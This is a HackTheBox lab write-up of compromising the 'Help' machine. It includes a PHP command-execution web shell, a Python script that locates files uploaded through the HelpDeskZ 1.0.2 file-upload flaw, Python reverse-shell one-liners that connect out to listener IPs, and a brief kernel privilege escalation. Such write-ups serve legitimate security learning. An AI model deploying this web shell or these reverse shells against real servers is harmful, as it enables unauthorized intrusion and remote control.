HackTheBox Writeups

Writeups for all the HTB boxes I have solved

View on GitHub

Help

alt text

Machine URL: https://www.hackthebox.eu/home/machines/profile/170

Machine IP: 10.10.10.121

DATE : 3/05/2019

START TIME: 9:50 AM

Nmap scan

alt text

There is nothing new going on in here. Just some basic ports along with a port 3000 running another website written in node.

Let’s enum both of those website and see what we find

dirsearch

alt text

So there’s a javascript folder but when we try to open it up we get error 403that means we are forbidden from accessing the content.

But we can open the /support/ URL.

Let’s see what we find on port 3000 i.e the nodejs website

alt text

The port 3000 looks like having an API. And there are two URLs that have been found.

Getting Credentials

If we visit the http://10.10.10.121:3000/ we get the following data:

 http http://10.10.10.121:3000/ | jq .
{
  "message": "Hi Shiv, To get access please find the credentials with given query"
}

We know one thing from this. That there’s a user(maybe admin?) named Shiv

Now visiting the graphql/ We get:

➜ http http://10.10.10.121:3000/graphql
HTTP/1.1 400 Bad Request
Connection: keep-alive
Date: Fri, 03 May 2019 04:57:46 GMT
Transfer-Encoding: chunked
X-Powered-By: Express

GET query missing.

So we can use this to find more information about the user and password.

Cracking the hash 5d3c93182bb20f07b994a7f617e99cff we get godhelpmeplz

CREDENTIALS: helpme@helpme.com:godhelpmeplz

NOTE: How did I found it in a first try? Read: https://github.com/Anonyme1396/security-tips/blob/master/web.md#exploiting-2

File Upload Vulnerability

A simple google search with Helpdeskz exploit bears out a result HelpDeskZ 1.0.2 - Arbitrary File Upload

This mean we can upload the file and then simply use this to find the location of the uploaded file.

I uploaded a backdoor.php

<?php
if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}
?>

When you’ll submit the file it is possible that you’ll get an error saying File is not allowed.. This does set me off first so I decided to go through the Helpdeskz source code, since it is open source application.

After looking around I found a file in include/parser called new-ticket.php

After the file is uploaded it perform a check on the $fileinfo by passing that value to a verifyAttachment function. Let’s take a look at this function

This function is perform multiple checks on the file but there’s isn’t any file extension check. This mean the error we are getting i.e File not allowed is meaningless and we can totally ignore it.

Exploit

One of my friend suggested to use the exploit from 0day

import requests
import hashlib
from time import time


def md5(data):
    return hashlib.md5(data.encode("utf-8")).hexdigest()


def get(base, filename, at):
    uploaded_file = "{}/uploads/tickets/{}.{}".format(
        base.rstrip("/"), md5(filename + str(at)), filename.split(".")[-1]
    )

    r = requests.get(uploaded_file)
    if r.status_code == 200:
        return uploaded_file


def main():
    for i in range(1000):
        url = get("http://10.10.10.121/support/", "backdoor.php", int(time() - i))
        if url is not None:
            print(url)
            return
    print("Oops ... not found")


if __name__ == "__main__":
    main()

Since there’s some timezone issue with Helpdeskz I decided to change the timezone.

Then I ran the exploit and got the path to the file.

http://10.10.10.121/support/uploads/tickets/84c045a6c4cccf0880fc139c6ba7599a.php

PWN USER

whoami

In this way we can get the user

PWN root

Now first we need to get reverse shell to get into the machine. I tried to pass

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

but for some reason this didn’t worked so I encoded everything and then decided to do it.

http://10.10.10.121/support/uploads/tickets/84c045a6c4cccf0880fc139c6ba7599a.php?cmd="python%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect((%2210.10.12.139%22%2C4444))%3Bos.dup2(s.fileno()%2C0)%3B%20os.dup2(s.fileno()%2C1)%3B%20os.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D)%3B%27"

With this I got the reverse shell.

Then I spawned a pty shell

python -c 'import pty; pty.spawn("/bin/sh")'

After that I enumerated with the help of LinEnum and found a kernel vulnerable to local privilege escalation vulnerability

So I downloaded the exploit and compiled it and then run it. This will give you the root shell. Then you can simply cat the /root/root.txt

b7fe6082dcdf0c1b1eXXXXXXXXXXXXXXX